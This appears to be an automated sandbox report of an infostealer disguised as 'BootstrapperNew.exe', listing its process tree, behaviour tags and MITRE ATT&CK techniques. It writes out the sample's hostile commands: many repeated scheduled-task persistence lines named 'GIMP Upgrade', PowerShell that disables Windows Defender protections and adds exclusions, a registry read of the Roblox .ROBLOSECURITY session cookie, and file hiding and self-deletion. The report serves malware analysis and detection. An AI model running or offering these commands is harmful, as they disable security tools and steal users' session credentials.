PID:1652
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:2664
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:708
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:4724
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:4332
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:5032
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵PID:840
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:5100
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵PID:3076
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:4564
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:1604
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:2612
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:4772
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:4960
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:5012
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:768
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:1292
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /k timeout 5 > NUL && "C:\Users\Admin\Downloads\BootstrapperNew.exe"2⤵PID:4288
-
C:\Windows\system32\timeout.exetimeout 53⤵
- Loads dropped DLL
- Delays execution with timeout.exe
- Suspicious behavior: EnumeratesProcesses
PID:2868
-
-
C:\Users\Admin\Downloads\BootstrapperNew.exe"C:\Users\Admin\Downloads\BootstrapperNew.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Drops file in Program Files directory
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4260 -
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵PID:4912
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
PID:4964
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵PID:3832
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
PID:952
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵PID:412
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵PID:3548
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵PID:3700
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
PID:3176
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵PID:2428
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
PID:4672
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵PID:3076
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵PID:2552
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵PID:4436
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵PID:3132
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵PID:1240
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
PID:4448
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵PID:2516
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
PID:2544
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵PID:3264
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
PID:5068
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵PID:924
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵PID:1032
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵PID:3504
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵PID:952
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵PID:4976
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
PID:2552
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵PID:2804
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
PID:4256
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵PID:3132
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
PID:720
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵PID:4960
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
PID:2992
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵PID:1268
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
PID:2704
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵PID:2476
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
PID:3020
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵PID:2512
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
PID:3228
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵PID:3032
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
PID:4972
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵PID:1240
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
PID:188
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵PID:2680
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
PID:4640
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵PID:3048
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
PID:2768
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵PID:3352
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵PID:3184
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵PID:3504
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
PID:5016
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit4⤵PID:3124
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
PID:2992
-
-
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:3932
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:5036
-
-
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:5032
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4124
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵
- Loads dropped DLL
PID:2552
-
C:\Users\Admin\Downloads\BootstrapperNew.exe"C:\Users\Admin\Downloads\BootstrapperNew.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Drops file in Program Files directory
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1888 -
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:4712
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:5000
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:3832
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:2036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\tyg5edla.pid.exe"' & exit2⤵PID:3680
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\tyg5edla.pid.exe"'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3500 -
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\tyg5edla.pid.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\tyg5edla.pid.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2372 -
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\tyg5edla.pid.exe"5⤵
- Views/modifies file attributes
PID:2780
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\tyg5edla.pid.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4316
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 25⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1460
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4436
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Suspicious use of AdjustPrivilegeToken
PID:412
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4884
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory5⤵PID:2876
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid5⤵PID:4712
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER5⤵
- Command and Scripting Interpreter: PowerShell
PID:1476
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name5⤵
- Detects videocard installed
PID:2272
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\tyg5edla.pid.exe" && pause5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4332 -
C:\Windows\system32\PING.EXEping localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3588
-
-
-
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:4964
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:3048
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:4592
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:4392
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:1872
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵PID:3792
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:2072
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:5040
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:748
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:1776
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:1136
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:2796
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:2024
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵PID:4532
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:1004
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:4964
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:2340
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵PID:4624
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:3868
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵PID:2692
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:460
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:720
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:2216
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵PID:3084
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:944
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:1144
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:5112
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:4460
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Shutdown /l /f2⤵PID:3256
-
C:\Windows\system32\shutdown.exeShutdown /l /f3⤵PID:2804
-
-
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:1004
-
C:\Users\Public\Pictures\xdwdNode.js.exe"C:\Users\Public\Pictures\xdwdNode.js.exe"1⤵
- Executes dropped EXE
PID:4484
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa390f855 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:780
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
